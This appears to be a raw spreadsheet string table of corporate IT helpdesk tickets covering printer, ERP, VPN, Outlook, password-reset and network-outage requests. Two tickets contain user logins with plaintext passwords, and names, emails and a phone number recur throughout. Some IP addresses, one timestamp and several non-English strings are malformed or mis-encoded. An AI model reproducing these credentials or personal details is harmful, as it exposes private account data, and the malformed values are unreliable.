    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1141 failed in job_scheduler at: 10/11/2016 00:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1141 failed in job_scheduler at: 10/10/2016 23:45:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1141 failed in job_scheduler at: 10/10/2016 23:45:00</t>
  </si>
  <si>
    <t>kis_zebra print</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gkwcxzum.answkqpe@gmail.com_x000D_
_x000D_
dear all_x000D_
_x000D_
this is jay from plant_69._x000D_
plant_69 receives airwaybill label from erp whenever we do pgi for export. sometimes, zebra printer doesn't print the label so_x000D_
plant_69 cancel the shipment and re-do pgi._x000D_
_x000D_
is there another way for us to have the label not to cancel pgi and re-do pgi ?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_HostName_770_inc failed in job_scheduler at: 10/10/2016 22:38:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_HostName_770_inc failed in job_scheduler at: 10/10/2016 22:38:00</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_keheu2 failed in job_scheduler at: 10/10/2016 22:37:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_keheu2 failed in job_scheduler at: 10/10/2016 22:37:00</t>
  </si>
  <si>
    <t>wifi ä¸èƒ½åœ¨çº¿</t>
  </si>
  <si>
    <t>qnvkwalx dfjtxigl</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_56filesys failed in job_scheduler at: 10/10/2016 22:24:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_56filesys failed in job_scheduler at: 10/10/2016 22:24:00</t>
  </si>
  <si>
    <t>æ— æ³•åˆ›å»ºskypeä¼šè®®ï¼Œoutlook æ—¥åŽ†ä¸Šé¢æ²¡æœ‰ skype online meeting åŠ è½½é¡¹ã€‚</t>
  </si>
  <si>
    <t>dqovxreg qswvlctg</t>
  </si>
  <si>
    <t>æˆ‘çš„outlook æ‰“å°é‚®ä»¶è®¾ç½®çºµå‘ï¼Œæ‰“å‡ºæ¥éƒ½æ˜¯æ¨ªå‘çš„ï¼Œèƒ½å¸®æˆ‘çœ‹ä¸€ä¸‹å—ï¼Ÿ</t>
  </si>
  <si>
    <t xml:space="preserve">æˆ‘çš„outlook æ‰“å°é‚®ä»¶è®¾ç½®çºµå‘ï¼Œæ‰“å‡ºæ¥éƒ½æ˜¯æ¨ªå‘çš„ï¼Œèƒ½å¸®æˆ‘çœ‹ä¸€ä¸‹å—ï¼Ÿ
dizquolf hlykecxa
ap accountant
dizquolf.hlykecxa@gmail.com
</t>
  </si>
  <si>
    <t>dizquolf hlykecxa</t>
  </si>
  <si>
    <t>posed inwarehouse_tool no.6223538861 cannot be shown in erp</t>
  </si>
  <si>
    <t xml:space="preserve">we posed po5616691482 in miro and erp issued no.6223538861. however, this voucher no. does not exist in fb03 as attachment shown. and in me23n, ir cannot be found after making gr and in fbl1n, the transaction still does not exist. only in mir4, no.6223538861 is shown as the posed inwarehouse_tool._x000D_
please tell us resolve the problem. </t>
  </si>
  <si>
    <t>carrier orders not processing.</t>
  </si>
  <si>
    <t>carrier orders not processing labels through shipping system in erp. getting the following error message. server is unable to process the request</t>
  </si>
  <si>
    <t>tmyeqika hfudpeot</t>
  </si>
  <si>
    <t>unable to connect to glog-old to search old data</t>
  </si>
  <si>
    <t>please assign this ticket to keyhtyvin toriaytun.  the glovia database is down.</t>
  </si>
  <si>
    <t xml:space="preserve">sales orders are not updating with correct delivery dates </t>
  </si>
  <si>
    <t xml:space="preserve">this is in reference to so# 35086652_x000D_
_x000D_
this all started with this email; "i called company and spoke with wkpnlvts oumeaxcz and has confirmed that the items are in route from germany and are scheduled to get to them on 10/18/16 and turn around and ship to us.  the new delivery date is for 10/19/16.  she was not sure why the date of 12/16/16 is on the company center."_x000D_
_x000D_
after investigating this and looking at screen shots provided by heidi, this is what is happening.  "manufacturing updated the information in the system, and if a csr ran an apo availability check on the art, they could see the updated date of 10/19, but it did not update the delivery date in the order.  i went into the order and manually ran a apo stock update on the order, and it updated the delivery date to 10/19.  if the customer were to look at it now through company center, they would see a delivery date of 10/19."_x000D_
_x000D_
when manufacturing updates the delivery time for an order, it has to update on all open orders for that item.  in this case it did not.  we are loosing orders because of this issue as it has been going on for some time now, but this is the first time i have documented screen shots of what was going on.  csrs can not run apo every time a date is changed in erp.  this has to be automated.  anything less is unacceptable.  _x000D_
 </t>
  </si>
  <si>
    <t>need ticket</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: dqplrwoy.cutpwjie@gmail.com_x000D_
_x000D_
2108696 â€“ this item was manufactured at plant_248 and received into plant_249.  it was received into stock at plant_249 on sept 14._x000D_
_x000D_
at that point i would have expected the system to have automatically moved the product to plant_101 where there is safety stock and forecast._x000D_
_x000D_
can you please advise if the process is working?  if it is working, can you please advise why this item did not move._x000D_
_x000D_
_x000D_
dqplrwoy cutpwjie_x000D_
supply chain planner_x000D_
strategic sourcing and supply planning_x000D_
dqplrwoy.cutpwjie@gmail.com&lt;mailto:dqplrwoy.cutpwjie@gmail.com&gt;_x000D_
724-539-5632_x000D_
_x000D_
company inc. | 1600 technology way | usa, pa 15650 | www.company.com&lt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>problem w/downloading .dxf files- error "certificate does not exist" - business_client- product engineering-</t>
  </si>
  <si>
    <t>contact sitmzuje ckrpsabm 
unable to save/download .dxf files when using the business_client.(screenshot attached)
error message persists when attempting to download the .dxf 2d engineering_drawing_tool files from the business_client(web based format). (from path business_client &gt; product engineering &gt; drawing search &gt; display document &gt; select document (e.g. 71322408_nxd_000~03.dxf )&gt;"copy to" &gt;select directory &gt; c:\users\mazurjw\documents\my drawings\ &gt; result = "certificate does not exist"</t>
  </si>
  <si>
    <t>sitmzuje ckrpsabm</t>
  </si>
  <si>
    <t xml:space="preserve">from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] 
sent: monday, october 10, 2016 8:59 pm
to: nwfodmhc exurcwkm
cc: tiyhum kuyiomar
subject: amar request to reset microsoft online services password for xbfcitlh.ntulmcpq@gmail.com
importance: high
    request to reset user's password   
   the following user in your organization has requested a password reset be performed for their account: 
â€¢ xbfcitlh.ntulmcpq@gmail.com 
â€¢ first name: theydbar 
â€¢ last name: brrgtyanthet-perry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</si>
  <si>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xbfcitlh ntulmcpq</t>
  </si>
  <si>
    <t>unable to take screenshot</t>
  </si>
  <si>
    <t>vip 2 // reset the password for buyoipdj fceymwtz on other / phone system - interaction desktop</t>
  </si>
  <si>
    <t>only need password rest for the phone in my office</t>
  </si>
  <si>
    <t>buyoipdj fceymwtz</t>
  </si>
  <si>
    <t>unable to open a website</t>
  </si>
  <si>
    <t>keqvyfzw qwbohdxg</t>
  </si>
  <si>
    <t>printer configure</t>
  </si>
  <si>
    <t>64 bit printer driver installation on new laptop</t>
  </si>
  <si>
    <t xml:space="preserve">customers not able to call into the company toll free number.  </t>
  </si>
  <si>
    <t xml:space="preserve">i just received a call from our sales person badgknqs xwelumfz, in st. louis mo stating that he tried to call in on the toll free number 10 time but received a message that the number was not in service. i checked the number he was dialing and he is dialing the correct number   urgent.  </t>
  </si>
  <si>
    <t>plqbesvo uopaexic</t>
  </si>
  <si>
    <t>muaqyliw sndypzlb</t>
  </si>
  <si>
    <t>issues with outlook // not responding</t>
  </si>
  <si>
    <t>krpvcmzg gyhfalmb</t>
  </si>
  <si>
    <t>outlook not working correctly</t>
  </si>
  <si>
    <t>outlook not working correctly  &amp; freezing</t>
  </si>
  <si>
    <t>hvstqfwc buvsrnze</t>
  </si>
  <si>
    <t>msd crm - outlook stops responding</t>
  </si>
  <si>
    <t xml:space="preserve">we ensured ipv6 was unchecked and that network connection was good. it was 'limited' initially but went to normal once denghyrt disconnected from vpn._x000D_
checked that outlook works okay in safe mode. reduced offline folder settings to 3 months from 12 months._x000D_
uninstalled and reinstalled crm dynamics (repair did not help)._x000D_
denghyrt will im me if he has any issues with tasks or reminders in crm (fdmaluyo.tvecikxn@gmail.com)_x000D_
</t>
  </si>
  <si>
    <t>rwyfmclk ugbvnwtq</t>
  </si>
  <si>
    <t>uhrixnta odueantp</t>
  </si>
  <si>
    <t>issue with outlook and vpn</t>
  </si>
  <si>
    <t>ich kann meinen vpn nicht Ã¶ffnen</t>
  </si>
  <si>
    <t>anivdcor rbmfhiox</t>
  </si>
  <si>
    <t>unable to open records in engineering_tool.</t>
  </si>
  <si>
    <t xml:space="preserve">engineering tool is downloading reports in .kpr format and engineering tool crashes. on reinstalling engineering tool, it is crashing too._x000D_
</t>
  </si>
  <si>
    <t>oujvmgeq spobcflw</t>
  </si>
  <si>
    <t>gbwviklo ukwijqtm</t>
  </si>
  <si>
    <t>knocked off vpn/ unable to get on na remote</t>
  </si>
  <si>
    <t>i was knocked off vpn at about 11:55am.  now i am unable to log back in via na remote.</t>
  </si>
  <si>
    <t>etime not working</t>
  </si>
  <si>
    <t xml:space="preserve">name:esqcuwbg gdcuhzqw
language:
browser:microsoft internet explorer
email:esqcuwbg.gdcuhzqw@gmail.com
customer number:
telephone:
summary:me e-time will not populate the names of my employees
</t>
  </si>
  <si>
    <t>esqcuwbg gdcuhzqw</t>
  </si>
  <si>
    <t>reset passwords for hybiaxlk lawptzir using password_management_tool password reset.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_370 failed in job_scheduler at: 10/78.93.52.6791:18:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_370 failed in job_scheduler at: 10/78.93.52.6791:18:00</t>
  </si>
  <si>
    <t>bgflmyar.xgufkidq@gmail.com</t>
  </si>
  <si>
    <t>bgflmyar.xgufkidq@gmail.com wanted to check if he can login to hr_tool on his phone</t>
  </si>
  <si>
    <t>erp front end missing</t>
  </si>
  <si>
    <t xml:space="preserve">i noticed that my erp front end programdnty seems to be gone for some reason. i will need this returned immediately to my desktop, with all prior levels of access set for it. </t>
  </si>
  <si>
    <t xml:space="preserve">unable to access erp 
user contacted for an issue where she's unable to access erp after her id got changed last friday.
i checked in password_management_tool and it's not showing any erp accounts under her name. only shows active directory and servers.
please help check with the user at the earliest on this as she needs to access erp SID_34 erp production.
old user id - coppthsy
new user id - humthyphk
</t>
  </si>
  <si>
    <t>unable to share calendar</t>
  </si>
  <si>
    <t>outlook not launching</t>
  </si>
  <si>
    <t>zebra pinter not working</t>
  </si>
  <si>
    <t xml:space="preserve">
name:lzapwbnc yrjekzqv
language:
browser:microsoft internet explorer
email:lzapwbnc.yrjekzqv@gmail.com&gt;
customer number:
telephone:
summary:hi, after an automatci upgrade i cannot print on zebra printer anymore.  the error message is runtime error 13
type mismatch.
can you give me support _</t>
  </si>
  <si>
    <t>lzapwbnc yrjekzqv</t>
  </si>
  <si>
    <t>blank call // loud noise // gso</t>
  </si>
  <si>
    <t>there a way to access hr_tool e-time from mobile device</t>
  </si>
  <si>
    <t>name:bgflmyar xgufkidq
language:
browser:microsoft internet explorer
email:bgflmyar.xgufkidq@gmail.com
customer number:
telephone
summary:is there a way to access hr_tool e-time from mobile device?</t>
  </si>
  <si>
    <t>bsujizqk zmlfkengineering_tool</t>
  </si>
  <si>
    <t>company center not pulling information from erp</t>
  </si>
  <si>
    <t>i have several company center accounts that are not pulling information from erp.  i checked to make sure they were created correctly and they are.  this is effecting channel partners ability to use company center.</t>
  </si>
  <si>
    <t>vpn</t>
  </si>
  <si>
    <t>vpn : vpn is working.</t>
  </si>
  <si>
    <t>dhraxivp enmfvuqb</t>
  </si>
  <si>
    <t>erp SID_34 locked out.</t>
  </si>
  <si>
    <t>tfzlohik esibqtvy</t>
  </si>
  <si>
    <t>erp SID_34 and erp SID_1 password reset</t>
  </si>
  <si>
    <t>bixvmnar glakoprc</t>
  </si>
  <si>
    <t>ethics flash player issue.</t>
  </si>
  <si>
    <t>reset passwords for fylrosuk kedgmiul using password_management_tool password reset.</t>
  </si>
  <si>
    <t>fylrosuk kedgmiul</t>
  </si>
  <si>
    <t>please to extend the user validation to development environment (SID_21) still are expired. - user vvamrtryot</t>
  </si>
  <si>
    <t>gdsjrxwl pzhyxdiq</t>
  </si>
  <si>
    <t>vpn is not working.</t>
  </si>
  <si>
    <t>us_plant (plant_269) - servers not connecting</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: dpuifqeo.eglwsfkn@gmail.com_x000D_
_x000D_
plant servers â€“ HostName_1259 and lrrsm007 â€“ are not connecting._x000D_
_x000D_
i can see gtehdnyu lights on the front of the server, but they are not blinking._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>printer problem / issue information -- zebra label printers</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</si>
  <si>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all usa zebra label printers -- s4m models_x000D_
 _x000D_
   â€¢  detailed description of the problem ? the zebra print software will not connect to erp.  see attached photos for errors received._x000D_
_x000D_
   â€¢  type of documents not printing?  product labels_x000D_
_x000D_
   â€¢  what system or application being used at time of the problem?   zebra print_x000D_
_x000D_
   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed? printer is able to print windows uacyltoe hxgaycze pages so it does not appear to be a pc/network/printer issue_x000D_
_x000D_
   â€¢  if erp system, which system?  SID_34_x000D_
_x000D_
      â€¢  if it's an erp printer problem can the erp output be rerouted to another erp printer temporarily? no_x000D_
         what printer can it be rerouted too? _x000D_
_x000D_
   â€¢  if document is not printing correctly, please scan copy of the document and attach to the ticketing_tool ticket.</t>
  </si>
  <si>
    <t>okfmbqur efzukjsa</t>
  </si>
  <si>
    <t>reset the password for kslhobgj cyhvefna on other / interaction desktop</t>
  </si>
  <si>
    <t>o drive missing</t>
  </si>
  <si>
    <t>xzupryaf vlbikhsm</t>
  </si>
  <si>
    <t>dw0080 unlock in erp SID_34</t>
  </si>
  <si>
    <t>unable to reach the collaboration_platform or crm</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: yorgbnpa.ndigthpj@gmail.com_x000D_
_x000D_
this is the error information:_x000D_
_x000D_
if that doesn't help, contact your support team and include these technical details:_x000D_
correlation id: 0b0dac9d-8010-3000-b1eb-26ad5dd2741f_x000D_
date and time: 10/10/2016 5:49:16 am_x000D_
url: #/sitepages/home.aspx_x000D_
user: yorgbnpa.ndigthpj@gmail.com_x000D_
issue type: user not in directory._x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>yorgbnpa ndigthpj</t>
  </si>
  <si>
    <t>s</t>
  </si>
  <si>
    <t>qlhmawgi sgwipoxn unlock and password reset ipglathybel</t>
  </si>
  <si>
    <t xml:space="preserve">ipglathybel qlhmawgi sgwipoxn password reset in erp </t>
  </si>
  <si>
    <t>clgfntoe rhtmnzsk</t>
  </si>
  <si>
    <t>network outage:germany, germany site hard down since 8:30 am et on 10/10.</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____no____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______8:30 am et on 10/10.________________x000D_
_x000D_
3.  scheduled maintenance ( power) ? ___no____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___no_____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ____na______   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    _______na____    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ____no___     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________________________       _x000D_
_x000D_
12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>outlook send/receive progress error</t>
  </si>
  <si>
    <t>i am unable to send from our ebusiness@company.com email. i had no problems up to last week. see screenshot of error.</t>
  </si>
  <si>
    <t>cmplfihy tajmzhfl</t>
  </si>
  <si>
    <t xml:space="preserve">zebra printer is not working after some updates </t>
  </si>
  <si>
    <t xml:space="preserve">hello&lt; when i try to print on zebra this error message appair _x000D_
please see the screen shot message ._x000D_
it seems that the problem is the erp connection ._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>erp SID_1 account unlock and password reset</t>
  </si>
  <si>
    <t>probleme mit laser02 \pfjwinbg ljtzbdqg</t>
  </si>
  <si>
    <t>probleme mit lasplant_119 \pfjwinbg ljtzbdqg</t>
  </si>
  <si>
    <t>archiving_tool client log file</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qjtbrvfy.avwqmhsp@gmail.com_x000D_
_x000D_
dear it team,_x000D_
_x000D_
archiving_tool archive does not open any inwarehouse_toolsâ€¦_x000D_
_x000D_
please repair. </t>
  </si>
  <si>
    <t>qjtbrvfy avwqmhsp</t>
  </si>
  <si>
    <t xml:space="preserve">plant_269 - erp error </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: dpuifqeo.eglwsfkn@gmail.com
getting this error when trying to print labels using zebra printers in shipping
[cid:image001.jpg@01d222cc.865bed90]
from: thoyhts brthyrtiv
sent: monday, october 10, 2016 8:02 am
to: dpuifqeo eglwsfkn &lt;dpuifqeo.eglwsfkn@gmail.com&gt;
subject: re: imp
yes because that is a erp error message.
</t>
  </si>
  <si>
    <t>user vvhthyoffc blocked (citrix)</t>
  </si>
  <si>
    <t xml:space="preserve">user vvbthryhn is blocked for citrix access, please unlock. </t>
  </si>
  <si>
    <t>rÃ¼cksetzung der passwÃ¶rter fÃ¼r accounts vvwtyeidt, vvftgors, vvnergtubj, vvthygschj</t>
  </si>
  <si>
    <t>yvjdluhk hmcpvtdj</t>
  </si>
  <si>
    <t>lean event can not be added.</t>
  </si>
  <si>
    <t>sclfndob gnibctwu</t>
  </si>
  <si>
    <t xml:space="preserve">scm_software </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: oetlgbfw.bsctrnwp@gmail.com
my supply_chain_software scm_software password has locked
please reset so i can log in
dthyan matheywtyuews
sales manager gl2
oetlgbfw.bsctrnwp@gmail.com&lt;mailto:oetlgbfw.bsctrnwp@gmail.com&gt;
</t>
  </si>
  <si>
    <t>usa: dell rack system - bfr78x1 hardware component: warning or critical state detected</t>
  </si>
  <si>
    <t xml:space="preserve">iom sensor, chassis and internal power supply has reporting some "non critical" alerts. could you please investigate and advise? </t>
  </si>
  <si>
    <t>zebra printer issue</t>
  </si>
  <si>
    <t>label printer not working. error "connection to erp could not be made"._x000D_
_x000D_
ip's: 51.87.92.3022_x000D_
74.78.07.2808_x000D_
79.54.90.8526_x000D_
06.52.09.1807_x000D_
39.58.59.0786_x000D_
39.58.59.0781_x000D_
_x000D_
error in attachment_x000D_
labels are not getting printed.</t>
  </si>
  <si>
    <t>label printer not working. error "connection to erp could not be made"._x000D_
printer name : prtoplant_168_x000D_
_x000D_
multiple location are affected. usa, germany also having same issues.</t>
  </si>
  <si>
    <t>submitted filled up engineering_tool on system</t>
  </si>
  <si>
    <t xml:space="preserve">i created engineering_tool and filled up all datas but when click to submit button it is given error message. please see message detail below. </t>
  </si>
  <si>
    <t>fhcmnxat geazkjcs</t>
  </si>
  <si>
    <t>erp crm - instant timeout</t>
  </si>
  <si>
    <t>user: kubyhtuaa
issue: when working with erp crm user encounters instant timeouts. please resolve or advise how to resolve.</t>
  </si>
  <si>
    <t>yjqvpkgn qbshvpje</t>
  </si>
  <si>
    <t>label printer not working. error "connection to erp could not be made"._x000D_
printer name : prtor0036, prtor0031_x000D_
_x000D_
labels are not getting printed.</t>
  </si>
  <si>
    <t>ayvqmkdx mzjcslnq</t>
  </si>
  <si>
    <t xml:space="preserve">set abc code erp 81807016 under me in crm. </t>
  </si>
  <si>
    <t>set abc code erp 81807016 under me in crm. in erp is ok.</t>
  </si>
  <si>
    <t>srhoeyza rkhuldgq</t>
  </si>
  <si>
    <t>i have been locked out of my accounts</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: plqbesvo.uopaexic@gmail.com
please help me reset my password
login is (dabhrujir3thy)
password was (ryljar42667)
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 10/10/2016 06:51:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 10/10/2016 06:51:00</t>
  </si>
  <si>
    <t>jehlsagi dhkfuswg</t>
  </si>
  <si>
    <t>automatische anmeldung</t>
  </si>
  <si>
    <t xml:space="preserve">wenn ich outlook aufrufe, will der rechner gleichzeitig sich auch noch mit collaboration_platform (?) verbinden.
das lautet : mit ihrem geschÃ¤fts- oder schulkonto anmelden. wenn ich meine emailadresse und mein password eingebe passiert aber nichts.
das stÃ¤ndige einblenden ist sehr stÃ¶rend
bitte um abhilfe
meine telefonnummer ist </t>
  </si>
  <si>
    <t>i cannot access the dob report.  i was able to access this before.  i need this report for the  global busienss</t>
  </si>
  <si>
    <t>i cannot access the dob report.  i was able to access this before.  i need this report for the global busienss</t>
  </si>
  <si>
    <t>GRP_57</t>
  </si>
  <si>
    <t>printer ag99 - printing ink empty</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: przcxbml.vnjdghui@gmail.com_x000D_
_x000D_
hello support team,_x000D_
_x000D_
the printer ag99 needs printing ink._x000D_
_x000D_
where do i get paper for the printer?_x000D_
_x000D_
may i ask you to support here._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>not able to connect to vpn</t>
  </si>
  <si>
    <t>mtzjkhpi sfcmyjzx</t>
  </si>
  <si>
    <t>unable process break bulk (sto)</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rxoynvgi.ntgdsehl@gmail.com
hi it team
kindly please assist as we unable to close break bulk (sto) in ecs system due to nothing in the system.
we have completely bulk for plant_283 and plant_101 sto in ecs system but nothing shown.
below attached your reference.
[cid:image001.png@01d2231d.d8c5ef80]
hydstheud mddwwyleh
operation supervisor
company distribution services of asia pte ltd
( asia regional distribution centre)
email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;</t>
  </si>
  <si>
    <t>abholen alte it equipment (2x cad ws nd monitor )\umykjweg jpwrfuhk</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rugdyxqh.aqvocmuy@gmail.com
good day all
please assist me in resetting my erp password
user name krugew245
kind </t>
  </si>
  <si>
    <t>rugdyxqh aqvocmuy</t>
  </si>
  <si>
    <t>bugs in to do list _operator dashbankrd</t>
  </si>
  <si>
    <t>please find the attachment for the issue detail.</t>
  </si>
  <si>
    <t>yrogbkts lmurgdcf</t>
  </si>
  <si>
    <t>network outage:juarez-dmvpn-1811-rtr01 is down since 4:39 am et on 10/10</t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____no____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ____ 4:39 am et on 10/10__________________x000D_
_x000D_
3.  scheduled maintenance ( power) ? __no_____    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? ___na____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  _no_____    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ___na_____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ______na_____   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ____na_______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</si>
  <si>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eu remote fails to connect ... na remote terminates automatically</t>
  </si>
  <si>
    <t xml:space="preserve">i'm trying to connect to eu remote, but only get ..._x000D_
_x000D_
your session is finished. _x000D_
logged out successfully._x000D_
</t>
  </si>
  <si>
    <t>ctvaejbo mjcerqwo</t>
  </si>
  <si>
    <t>erp password change with password_management_tool: error: password change failed. old password is invalidated</t>
  </si>
  <si>
    <t xml:space="preserve">hi gso,_x000D_
i tried thrgxqsuojr xwbesorfs to renew my password from erp with password_management_tool password manager. it doesnt work...._x000D_
_x000D_
error message:_x000D_
error: password change failed. old password is invalidated. please try again using a different password. failed to perform operation [reset]. _x000D_
_x000D_
please reset my password._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>vykbweum hpvctbse</t>
  </si>
  <si>
    <t>install hardcopy \ewew8323647 \rhaycqjg arcgonvy</t>
  </si>
  <si>
    <t>rhaycqjg arcgonvy</t>
  </si>
  <si>
    <t>can not connect to the hana server via us vpn</t>
  </si>
  <si>
    <t>i'm using the us vpn as the european one is down fjaqbgnld yukdzwxs.  i can't reach the hana box.  i can connect to all other machines on the network. i have attached the reporting_tool failure and a tracert to the box.  i have rebooted my machine and broadband.</t>
  </si>
  <si>
    <t>hldifrbv gadyktfz</t>
  </si>
  <si>
    <t>circuit outage: germany ,erkheim-dmvpn-2821-rtr01 is down since 3:31 am et on 10/09.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     _ x___circuit     ____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ____3:31 am et on 10/09.__________________x000D_
_x000D_
3.  scheduled maintenance ( power) ? ____no___    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? ____na___    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  ____yes__    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ___yes_____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ______na_____   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    _______na____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</si>
  <si>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probleme mit we110 \die druckerwarteschlange wird zurzeit nicht ausgefÃ¼hrt \fdyietau dvsyxwbu</t>
  </si>
  <si>
    <t xml:space="preserve">paper jam for insert printer </t>
  </si>
  <si>
    <t>tcoyfeph cqrdaunw</t>
  </si>
  <si>
    <t>different problems - please reinstall eagw8111412 with current fy17 company image - upgrade ramdnty to 8gb</t>
  </si>
  <si>
    <t>jkshpurg isjgbdch</t>
  </si>
  <si>
    <t>enter and edit the link</t>
  </si>
  <si>
    <t>vroxskje.bixtmefd@gmail.com need to enter and edit the link:{e248922f-456b-4fdd-8c6d-d94083a94009}&amp;file=apac%20-%20approved%20exception%20list.xlsx&amp;action=default</t>
  </si>
  <si>
    <t>vpn not getting log in</t>
  </si>
  <si>
    <t>name:vithrkas 
language:
browser:microsoft internet explorer
email:xiwegtas.ygrfbzon@gmail.com
customer number:
telephone:
summary:vpn not getting log in</t>
  </si>
  <si>
    <t>xiwegtas ygrfbzon</t>
  </si>
  <si>
    <t>i cant have preview of pictures in explorer. i just see icons.</t>
  </si>
  <si>
    <t xml:space="preserve">i cant have preview of pictures in explorer. i just see icons.
</t>
  </si>
  <si>
    <t>host HostName_1178 is disconnected in vsphere</t>
  </si>
  <si>
    <t>vpn connection issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qwvpgayb.amniujsh@gmail.com_x000D_
_x000D_
hi,_x000D_
i cannot access the vpn. when i click on "open new session" nothing happens._x000D_
</t>
  </si>
  <si>
    <t>qwvpgayb amniujsh</t>
  </si>
  <si>
    <t>erp password &amp; password -- reg</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: xdvwitpm.zscxqdho@gmail.com
sir,
my user id is bathylardb &amp; given password is india16. but im unable to login to the erp
request you to reset the password &amp; send the same.
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_481 failed in job_scheduler at: 10/10/2016 03:09:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_481 failed in job_scheduler at: 10/10/2016 03:09:00</t>
  </si>
  <si>
    <t>india pbx awyl8328998 is down since 2:56am et on 10/10/2016.</t>
  </si>
  <si>
    <t>india awyl8328998 is down since 2:56am et on 10/10/2016.</t>
  </si>
  <si>
    <t>add user ashtusis pyhuule (phufsav) to active directory eagcutview</t>
  </si>
  <si>
    <t xml:space="preserve">add user ashtusis pyhuule (phufsav) to active directory eagcutview
remove user yhru manyhsu (ayujdm) from this ad.
</t>
  </si>
  <si>
    <t>skocrqdw pexcdfao</t>
  </si>
  <si>
    <t>germany, germany:gigabitethernet2/0/17  on germany-edksw002-2960-stack-sw002 went down at 10/10/2016 2:25 am et</t>
  </si>
  <si>
    <t>reset password erp SID_34</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zuxcfonv.nyhpkrbe@gmail.com
gso,
please kindly reset password for zhhtyangq with erp SID_34  , </t>
  </si>
  <si>
    <t xml:space="preserve">reeset password </t>
  </si>
  <si>
    <t>skype lÃ¤d auf dem pc nicht.</t>
  </si>
  <si>
    <t xml:space="preserve">skype wird nicht vom browser geladen auch nicht nach langer wartezeit </t>
  </si>
  <si>
    <t>qpbwfvdm ytlnodrv</t>
  </si>
  <si>
    <t>tvrigdbl mjsepfda</t>
  </si>
  <si>
    <t xml:space="preserve">unlock erp SID_34 </t>
  </si>
  <si>
    <t>_x000D_
_x000D_
received from: zuxcfonv.nyhpkrbe@gmail.com_x000D_
_x000D_
gso,_x000D_
_x000D_
please unlock the erp SID_34 for linz ,</t>
  </si>
  <si>
    <t>skype not work.</t>
  </si>
  <si>
